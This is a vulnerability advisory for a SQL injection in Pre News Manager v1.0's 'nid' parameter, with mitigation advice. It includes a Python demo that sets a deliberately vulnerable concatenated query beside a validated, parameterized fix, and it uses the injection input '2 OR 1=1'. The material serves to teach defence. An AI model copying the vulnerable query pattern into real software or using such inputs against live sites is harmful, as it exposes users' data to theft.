vendor: News Manager
by: Unknown
CVSS: 6.5 (MEDIUM)
Vulnerability Type: Remote SQL Injection
CWE: 89
Product Name: News Manager
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Pre News Manager v1.0 Remote SQL Injection
The vulnerability allows an attacker to execute arbitrary SQL queries against the database by manipulating the 'nid' parameter of the 'news_detail.php' script. Because the parameter value is placed into the query without checking, injected SQL code lets an attacker retrieve sensitive information, such as passwords, from the 'admin' table.
Mitigation:
To mitigate this vulnerability, user input should be validated and sanitized before it is used in any SQL query; for 'nid', that means accepting only an integer identifier. Additionally, prepared statements or parameterized queries prevent SQL injection because the database receives the value separately from the query text and never interprets it as SQL.
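As an added illustration (not code from the News Manager project, whose script is PHP): a Python/sqlite3 stand-in for 'news_detail.php' that shows the concatenated query the advisory describes beside a version that validates 'nid' as an integer and binds it as a query parameter. The 'news' table and its rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (nid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(1, "First post"), (2, "Second post"), (3, "Third post")],
    )
    return conn


def news_detail_vulnerable(conn, nid):
    """The pattern the advisory describes: the request parameter is pasted
    straight into the SQL text, so whatever it contains becomes part of the query."""
    sql = "SELECT nid, title FROM news WHERE nid = " + nid
    return conn.execute(sql).fetchall()


def news_detail_fixed(conn, nid):
    """Hardened version: validate the identifier, then bind it as a parameter.
    Returns None when the input is rejected (the caller would answer with an error)."""
    # 1. Validate: a news id must be a plain non-negative integer.
    if not nid.isdigit():
        return None
    # 2. Parameterize: the value travels separately from the query text,
    #    so the database engine never treats it as SQL.
    sql = "SELECT nid, title FROM news WHERE nid = ?"
    return conn.execute(sql, (int(nid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tampered = "2 OR 1=1"  # constructed input that alters the query's logic
    print(news_detail_vulnerable(db, tampered))  # every row, not just nid 2
    print(news_detail_fixed(db, tampered))       # None: rejected before any query
    print(news_detail_fixed(db, "2"))            # [(2, 'Second post')]
```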